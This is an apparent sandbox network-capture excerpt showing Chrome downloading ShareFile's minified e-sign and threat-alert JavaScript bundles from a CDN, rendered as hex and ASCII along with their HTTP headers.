                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Date: Tue, 08 Oct 2024 18:49:11 GMT
                                                                                                                                                                                                                                                                                ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 3b02f73dccc5077f1ad544a27a475ed6.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: 7Lj8eCktAA9QGSmVZIBy5VJd_zscTzQYri9PEVPES5j3hX_eNOorQQ==
                                                                                                                                                                                                                                                                                Age: 83764
                                                                                                                                                                                                                                                                                Vary: Origin


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                47192.168.2.64977213.224.189.1154432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC418OUTGET /sharefile-web/sharefiledev-esign-pilet/1.218.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC549INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 775322
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Last-Modified: Wed, 25 Sep 2024 06:18:48 GMT
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 07:37:41 GMT
                                                                                                                                                                                                                                                                                ETag: "ed5aeea53278040b2022dea269dc2b98"
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 2ec3090d74e200e4acdb2780da3c3c44.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: SIL7Qss2wTdPuEB7F8cNSkIWRjHb2YtvHcjzE738etZpWm2hECd9lQ==
                                                                                                                                                                                                                                                                                Age: 37654
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC15835INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 65 73 69 67 6e 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 69 3d 7b 7d 2c 6f 3d 7b 7d 2c 72 3d 7b 7d 2c 61 3d 7b 7d 2c 73 3d 7b 7d 2c 6c 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevesignpilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(e,t){var n={},i={},o={},r={},a={},s={},l={};return Object.defineProperty
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC16384INData Raw: 73 73 7c 73 74 72 69 6e 67 7c 73 74 72 6f 6b 65 7c 73 74 72 6f 6b 65 44 61 73 68 61 72 72 61 79 7c 73 74 72 6f 6b 65 44 61 73 68 6f 66 66 73 65 74 7c 73 74 72 6f 6b 65 4c 69 6e 65 63 61 70 7c 73 74 72 6f 6b 65 4c 69 6e 65 6a 6f 69 6e 7c 73 74 72 6f 6b 65 4d 69 74 65 72 6c 69 6d 69 74 7c 73 74 72 6f 6b 65 4f 70 61 63 69 74 79 7c 73 74 72 6f 6b 65 57 69 64 74 68 7c 73 75 72 66 61 63 65 53 63 61 6c 65 7c 73 79 73 74 65 6d 4c 61 6e 67 75 61 67 65 7c 74 61 62 6c 65 56 61 6c 75 65 73 7c 74 61 72 67 65 74 58 7c 74 61 72 67 65 74 59 7c 74 65 78 74 41 6e 63 68 6f 72 7c 74 65 78 74 44 65 63 6f 72 61 74 69 6f 6e 7c 74 65 78 74 52 65 6e 64 65 72 69 6e 67 7c 74 65 78 74 4c 65 6e 67 74 68 7c 74 6f 7c 74 72 61 6e 73 66 6f 72 6d 7c 75 31 7c 75 32 7c 75 6e 64 65 72 6c 69
                                                                                                                                                                                                                                                                                Data Ascii: ss|string|stroke|strokeDasharray|strokeDashoffset|strokeLinecap|strokeLinejoin|strokeMiterlimit|strokeOpacity|strokeWidth|surfaceScale|systemLanguage|tableValues|targetX|targetY|textAnchor|textDecoration|textRendering|textLength|to|transform|u1|u2|underli
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC16384INData Raw: 5c 6e 5c 74 35 30 25 20 7b 5c 6e 5c 74 5c 74 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 31 38 30 64 65 67 29 3b 5c 6e 5c 74 7d 5c 6e 5c 74 37 35 25 20 7b 5c 6e 5c 74 5c 74 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 32 37 30 64 65 67 29 3b 5c 6e 5c 74 7d 5c 6e 22 5d 29 29 29 2c 43 3d 28 30 2c 62 2e 41 29 28 79 29 28 61 7c 7c 28 61 3d 28 30 2c 68 2e 41 29 28 5b 22 5c 6e 5c 74 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 22 2c 22 3b 5c 6e 5c 74 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 30 2e 37 73 3b 5c 6e 5c 74 61 6e 69 6d 61 74 69 6f 6e 2d 69 74 65 72 61 74 69 6f 6e 2d 63 6f 75 6e 74 3a 20 69 6e 66 69 6e 69 74 65 3b 5c 6e 5c 74 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 20 73 74
                                                                                                                                                                                                                                                                                Data Ascii: \n\t50% {\n\t\ttransform: rotate(180deg);\n\t}\n\t75% {\n\t\ttransform: rotate(270deg);\n\t}\n"]))),C=(0,b.A)(y)(a||(a=(0,h.A)(["\n\tanimation-name: ",";\n\tanimation-duration: 0.7s;\n\tanimation-iteration-count: infinite;\n\tanimation-timing-function: st
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC16384INData Raw: 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 61 72 67 75 6d 65 6e 74 73 5b 31 5d 21 3d 3d 75 6e 64 65 66 69 6e 65 64 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 22 23 34 41 39 39 31 32 22 3b 72 65 74 75 72 6e 20 69 5b 22 64 65 66 61 75 6c 74 22 5d 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 76 67 22 2c 7b 22 64 61 74 61 2d 72 65 70 6c 61 63 65 2d 63 6f 6c 6f 72 22 3a 74 2c 77 69 64 74 68 3a 22 32 34 22 2c 68 65 69 67 68 74 3a 22 32 34 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 34 20 32 34 22 2c 66 69 6c 6c 3a 22 6e 6f 6e 65 22 7d 2c 69 5b 22 64 65 66 61 75 6c 74 22 5d 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 74 69 74 6c 65 22 2c 6e 75 6c 6c 2c 65 29 2c 69 5b 22 64 65 66 61 75 6c 74 22 5d 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70
                                                                                                                                                                                                                                                                                Data Ascii: ents.length>1&&arguments[1]!==undefined?arguments[1]:"#4A9912";return i["default"].createElement("svg",{"data-replace-color":t,width:"24",height:"24",viewBox:"0 0 24 24",fill:"none"},i["default"].createElement("title",null,e),i["default"].createElement("p
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC16384INData Raw: 61 74 65 3a 7b 6a 75 6d 70 5f 62 61 63 6b 5f 6d 6f 6e 74 68 3a 22 52 65 74 72 6f 63 65 64 65 72 20 75 6e 20 6d 65 73 22 2c 6a 75 6d 70 5f 62 61 63 6b 5f 79 65 61 72 3a 22 52 65 74 72 6f 63 65 64 65 72 20 75 6e 20 61 c3 b1 6f 22 2c 6a 75 6d 70 5f 66 6f 72 77 61 72 64 5f 6d 6f 6e 74 68 3a 22 41 76 61 6e 7a 61 72 20 75 6e 20 6d 65 73 22 2c 6a 75 6d 70 5f 66 6f 72 77 61 72 64 5f 79 65 61 72 3a 22 41 76 61 6e 7a 61 72 20 75 6e 20 61 c3 b1 6f 22 2c 73 65 6c 65 63 74 5f 64 61 74 65 3a 22 53 65 6c 65 63 63 69 6f 6e 61 72 20 66 65 63 68 61 22 7d 2c 67 65 6e 65 72 69 63 5f 65 72 72 6f 72 5f 6d 65 73 73 61 67 65 3a 22 53 65 20 68 61 20 70 72 6f 64 75 63 69 64 6f 20 75 6e 20 65 72 72 6f 72 22 2c 68 69 64 65 5f 70 61 73 73 77 6f 72 64 3a 22 4f 63 75 6c 74 61 72 20 63
                                                                                                                                                                                                                                                                                Data Ascii: ate:{jump_back_month:"Retroceder un mes",jump_back_year:"Retroceder un ao",jump_forward_month:"Avanzar un mes",jump_forward_year:"Avanzar un ao",select_date:"Seleccionar fecha"},generic_error_message:"Se ha producido un error",hide_password:"Ocultar c
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC16384INData Raw: 83 ab 22 2c 46 69 6c 65 62 6f 78 49 63 6f 6e 3a 22 46 69 6c 65 42 6f 78 22 2c 46 6c 61 73 68 49 63 6f 6e 3a 22 46 6c 61 73 68 20 e3 83 95 e3 82 a1 e3 82 a4 e3 83 ab 22 2c 46 6f 6c 64 65 72 49 63 6f 6e 3a 22 e3 83 95 e3 82 a9 e3 83 ab e3 83 80 e3 83 bc 22 2c 49 6c 6c 75 73 74 72 61 74 6f 72 49 63 6f 6e 3a 22 49 6c 6c 75 73 74 72 61 74 6f 72 20 e3 83 95 e3 82 a1 e3 82 a4 e3 83 ab 22 2c 49 6d 61 67 65 73 49 63 6f 6e 3a 22 e3 82 a4 e3 83 a1 e3 83 bc e3 82 b8 20 e3 83 95 e3 82 a1 e3 82 a4 e3 83 ab 22 2c 49 6e 64 65 73 69 67 6e 49 63 6f 6e 3a 22 49 6e 64 65 73 69 67 6e 20 e3 83 95 e3 82 a1 e3 82 a4 e3 83 ab 22 2c 49 6e 66 6f 49 63 6f 6e 3a 22 e6 83 85 e5 a0 b1 e3 82 a2 e3 82 a4 e3 82 b3 e3 83 b3 22 2c 4b 65 79 6e 6f 74 65 49 63 6f 6e 3a 22 4b 65 79 6e 6f 74 65
                                                                                                                                                                                                                                                                                Data Ascii: ",FileboxIcon:"FileBox",FlashIcon:"Flash ",FolderIcon:"",IllustratorIcon:"Illustrator ",ImagesIcon:" ",IndesignIcon:"Indesign ",InfoIcon:"",KeynoteIcon:"Keynote
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC16384INData Raw: 64 3d 6e 28 33 39 37 31 29 2c 6d 3d 6e 28 36 37 33 34 29 2c 70 3d 6e 28 38 39 31 30 29 2c 67 3d 6e 28 33 36 38 35 29 2c 68 3d 6e 28 34 33 35 36 29 3b 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 65 29 29 72 65 74 75 72 6e 20 65 7d 28 65 29 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 6e 75 6c 6c 3d 3d 65 3f 6e 75 6c 6c 3a 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 65 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 7c 7c 65 5b 22 40 40 69 74 65 72 61 74 6f 72 22 5d 3b 69 66 28 6e 75 6c 6c 21 3d 6e 29 7b 76 61 72 20 69 2c 6f 2c 72 2c 61 2c 73 3d 5b 5d 2c 6c 3d 21 30 2c 63 3d 21 31 3b
                                                                                                                                                                                                                                                                                Data Ascii: d=n(3971),m=n(6734),p=n(8910),g=n(3685),h=n(4356);function f(e,t){return function(e){if(Array.isArray(e))return e}(e)||function(e,t){var n=null==e?null:"undefined"!=typeof Symbol&&e[Symbol.iterator]||e["@@iterator"];if(null!=n){var i,o,r,a,s=[],l=!0,c=!1;
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC16384INData Raw: 2c 74 2c 6e 29 3b 72 65 74 75 72 6e 20 61 2e 6a 2e 62 61 74 63 68 28 28 28 29 3d 3e 7b 76 61 72 20 65 2c 74 3b 69 66 28 74 68 69 73 2e 71 75 65 72 79 43 61 63 68 65 2e 66 69 6e 64 41 6c 6c 28 69 29 2e 66 6f 72 45 61 63 68 28 28 65 3d 3e 7b 65 2e 69 6e 76 61 6c 69 64 61 74 65 28 29 7d 29 29 2c 22 6e 6f 6e 65 22 3d 3d 3d 69 2e 72 65 66 65 74 63 68 54 79 70 65 29 72 65 74 75 72 6e 20 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 29 3b 63 6f 6e 73 74 20 6e 3d 7b 2e 2e 2e 69 2c 74 79 70 65 3a 6e 75 6c 6c 21 3d 28 65 3d 6e 75 6c 6c 21 3d 28 74 3d 69 2e 72 65 66 65 74 63 68 54 79 70 65 29 3f 74 3a 69 2e 74 79 70 65 29 3f 65 3a 22 61 63 74 69 76 65 22 7d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 72 65 66 65 74 63 68 51 75 65 72 69 65 73 28 6e 2c 72 29 7d 29 29 7d
                                                                                                                                                                                                                                                                                Data Ascii: ,t,n);return a.j.batch((()=>{var e,t;if(this.queryCache.findAll(i).forEach((e=>{e.invalidate()})),"none"===i.refetchType)return Promise.resolve();const n={...i,type:null!=(e=null!=(t=i.refetchType)?t:i.type)?e:"active"};return this.refetchQueries(n,r)}))}
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC16384INData Raw: 65 22 65 6e 64 22 3a 72 65 74 75 72 6e 20 6e 2e 73 74 6f 70 28 29 7d 7d 29 2c 6e 29 7d 29 29 29 7d 2c 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 54 72 61 6e 73 61 63 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 28 30 2c 69 2e 5f 5f 61 77 61 69 74 65 72 29 28 74 68 69 73 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 62 28 29 2e 6d 61 72 6b 28 28 66 75 6e 63 74 69 6f 6e 20 74 28 29 7b 76 61 72 20 6e 2c 69 3b 72 65 74 75 72 6e 20 62 28 29 2e 77 72 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 66 6f 72 28 3b 3b 29 73 77 69 74 63 68 28 74 2e 70 72 65 76 3d 74 2e 6e 65 78 74 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 6e 3d 22 22 2e 63 6f 6e 63 61 74 28 76 2e 6c 65 67 61 63 79 55 72 6c 2c 22 2f 76 31 2f 64 6f 63 75 6d 65 6e 74 5f 74
                                                                                                                                                                                                                                                                                Data Ascii: e"end":return n.stop()}}),n)})))},createDocumentTransaction:function(e){return(0,i.__awaiter)(this,void 0,void 0,b().mark((function t(){var n,i;return b().wrap((function(t){for(;;)switch(t.prev=t.next){case 0:return n="".concat(v.legacyUrl,"/v1/document_t
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC16384INData Raw: 22 65 6e 64 22 3a 72 65 74 75 72 6e 20 6e 2e 73 74 6f 70 28 29 7d 7d 29 2c 6e 29 7d 29 29 29 7d 2c 67 65 74 50 61 73 73 63 6f 64 65 49 6e 66 6f 72 6d 61 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 28 30 2c 69 2e 5f 5f 61 77 61 69 74 65 72 29 28 74 68 69 73 2c 76 6f 69 64 20 30 2c 76 6f 69 64 20 30 2c 62 28 29 2e 6d 61 72 6b 28 28 66 75 6e 63 74 69 6f 6e 20 6e 28 29 7b 76 61 72 20 69 2c 6f 3b 72 65 74 75 72 6e 20 62 28 29 2e 77 72 61 70 28 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 66 6f 72 28 3b 3b 29 73 77 69 74 63 68 28 6e 2e 70 72 65 76 3d 6e 2e 6e 65 78 74 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 69 3d 22 22 2e 63 6f 6e 63 61 74 28 76 2e 6c 65 67 61 63 79 55 72 6c 2c 22 2f 76 31 2f 73 69 67 6e 65 72 73 2f 22 29 2e 63
                                                                                                                                                                                                                                                                                Data Ascii: "end":return n.stop()}}),n)})))},getPasscodeInformation:function(e,t){return(0,i.__awaiter)(this,void 0,void 0,b().mark((function n(){var i,o;return b().wrap((function(n){for(;;)switch(n.prev=n.next){case 0:return i="".concat(v.legacyUrl,"/v1/signers/").c


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                48192.168.2.64977313.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC605OUTGET /sharefile-web/sharefiledev-threatalert-mgt-pilet/1.14.0/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC611INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 904512
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 05 Mar 2024 06:32:15 GMT
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:02 GMT
                                                                                                                                                                                                                                                                                ETag: "4bca71b5e96ba1017d2f126850c99835"
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 f7bf326347bdd7f275a38a22b5b83724.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: dx-8Hs2ES6Eokxt4TW9HatFNPtddLBqists_LF08pQQvuOpbykXRBg==
                                                                                                                                                                                                                                                                                Age: 45973
                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC15773INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 74 68 72 65 61 74 61 6c 65 72 74 6d 67 74 70 69 6c 65 74 2c 7b 22 40 63 69 74 72 69 74 65 2f 63 69 74 72 69 78 2d 75 69 40 32 35 2e 34 36 2e 30 22 3a 22 63 69 74 72 69 74 65 2d 63 69 74 72 69 78 2d 75 69 2e 6a 73 22 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 72 65 61 63 74 22 2c 22 40 63 69 74 72 69 74 65 2f 63 69 74 72 69 78 2d 75 69 40 32 35 2e 34 36 2e 30 22 2c 22 74 73 6c 69 62 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevthreatalertmgtpilet,{"@citrite/citrix-ui@25.46.0":"citrite-citrix-ui.js"})System.register(["react","@citrite/citrix-ui@25.46.0","tslib","react-dom"],(function(e,t){var n={},r={},o={},i={};return Object.defineProper
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC16384INData Raw: 6d 65 2c 70 6f 72 74 3a 6e 2e 70 6f 72 74 2c 70 61 74 68 6e 61 6d 65 3a 22 2f 22 3d 3d 3d 6e 2e 70 61 74 68 6e 61 6d 65 2e 63 68 61 72 41 74 28 30 29 3f 6e 2e 70 61 74 68 6e 61 6d 65 3a 22 2f 22 2b 6e 2e 70 61 74 68 6e 61 6d 65 7d 7d 72 65 74 75 72 6e 20 65 3d 6f 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 72 2e 69 73 53 74 72 69 6e 67 28 74 29 3f 6f 28 74 29 3a 74 3b 72 65 74 75 72 6e 20 6e 2e 70 72 6f 74 6f 63 6f 6c 3d 3d 3d 65 2e 70 72 6f 74 6f 63 6f 6c 26 26 6e 2e 68 6f 73 74 3d 3d 3d 65 2e 68 6f 73 74 7d 7d 28 29 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 21 30 7d 7d 2c 36 30 31 36 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72
                                                                                                                                                                                                                                                                                Data Ascii: me,port:n.port,pathname:"/"===n.pathname.charAt(0)?n.pathname:"/"+n.pathname}}return e=o(window.location.href),function(t){var n=r.isString(t)?o(t):t;return n.protocol===e.protocol&&n.host===e.host}}():function(){return!0}},6016:(e,t,n)=>{"use strict";var
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC16384INData Raw: 69 6e 65 50 72 6f 70 65 72 74 79 2c 64 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 4e 61 6d 65 73 2c 70 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 2c 66 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 2c 6d 3d 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 2c 68 3d 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 3b 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 20 67 28 65 2c 74 2c 6e 29 7b 69 66 28 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 74 29 7b 69 66 28 68 29 7b 76 61 72 20 72 3d 6d 28 74 29 3b 72 26 26 72 21 3d 3d 68 26 26 67 28 65 2c 72 2c 6e 29 7d 76 61 72 20 6f 3d 64 28 74 29 3b 70 26 26 28 6f 3d 6f 2e
                                                                                                                                                                                                                                                                                Data Ascii: ineProperty,d=Object.getOwnPropertyNames,p=Object.getOwnPropertySymbols,f=Object.getOwnPropertyDescriptor,m=Object.getPrototypeOf,h=Object.prototype;e.exports=function g(e,t,n){if("string"!=typeof t){if(h){var r=m(t);r&&r!==h&&g(e,r,n)}var o=d(t);p&&(o=o.
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC15838INData Raw: 2e 65 78 70 6f 72 74 73 3d 73 28 6e 28 33 31 33 32 29 2c 6e 28 32 32 35 31 29 2c 6e 28 36 31 30 36 29 29 3a 28 6f 3d 5b 6e 28 33 31 33 32 29 2c 6e 28 32 32 35 31 29 2c 6e 28 36 31 30 36 29 5d 2c 28 69 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 72 3d 73 29 3f 72 2e 61 70 70 6c 79 28 74 2c 6f 29 3a 72 29 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 7c 7c 28 65 2e 65 78 70 6f 72 74 73 3d 69 29 29 7d 28 30 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 6f 3d 72 26 26 72 2e 55 52 49 3b 66 75 6e 63 74 69 6f 6e 20 69 28 65 2c 74 29 7b 76 61 72 20 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 3d 31 3b 69 66 28 21 28 74 68 69 73 20 69 6e 73 74 61 6e 63 65 6f 66 20 69 29 29 72 65 74
                                                                                                                                                                                                                                                                                Data Ascii: .exports=s(n(3132),n(2251),n(6106)):(o=[n(3132),n(2251),n(6106)],(i="function"==typeof(r=s)?r.apply(t,o):r)===undefined||(e.exports=i))}(0,(function(e,t,n,r){"use strict";var o=r&&r.URI;function i(e,t){var n=arguments.length>=1;if(!(this instanceof i))ret
                                                                                                                                                                                                                                                                                2024-10-09 18:05:14 UTC16384INData Raw: 2c 73 3d 28 61 3d 21 28 74 3d 72 7c 7c 6f 29 29 26 26 6e 26 26 6e 2e 68 61 73 28 74 68 69 73 2e 5f 70 61 72 74 73 2e 68 6f 73 74 6e 61 6d 65 29 2c 6c 3d 61 26 26 69 2e 69 64 6e 5f 65 78 70 72 65 73 73 69 6f 6e 2e 74 65 73 74 28 74 68 69 73 2e 5f 70 61 72 74 73 2e 68 6f 73 74 6e 61 6d 65 29 2c 63 3d 61 26 26 69 2e 70 75 6e 79 63 6f 64 65 5f 65 78 70 72 65 73 73 69 6f 6e 2e 74 65 73 74 28 74 68 69 73 2e 5f 70 61 72 74 73 2e 68 6f 73 74 6e 61 6d 65 29 29 2c 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 29 7b 63 61 73 65 22 72 65 6c 61 74 69 76 65 22 3a 72 65 74 75 72 6e 20 75 3b 63 61 73 65 22 61 62 73 6f 6c 75 74 65 22 3a 72 65 74 75 72 6e 21 75 3b 63 61 73 65 22 64 6f 6d 61 69 6e 22 3a 63 61 73 65 22 6e 61 6d 65 22 3a 72 65 74 75 72 6e 20 61 3b 63 61 73 65
                                                                                                                                                                                                                                                                                Data Ascii: ,s=(a=!(t=r||o))&&n&&n.has(this._parts.hostname),l=a&&i.idn_expression.test(this._parts.hostname),c=a&&i.punycode_expression.test(this._parts.hostname)),e.toLowerCase()){case"relative":return u;case"absolute":return!u;case"domain":case"name":return a;case
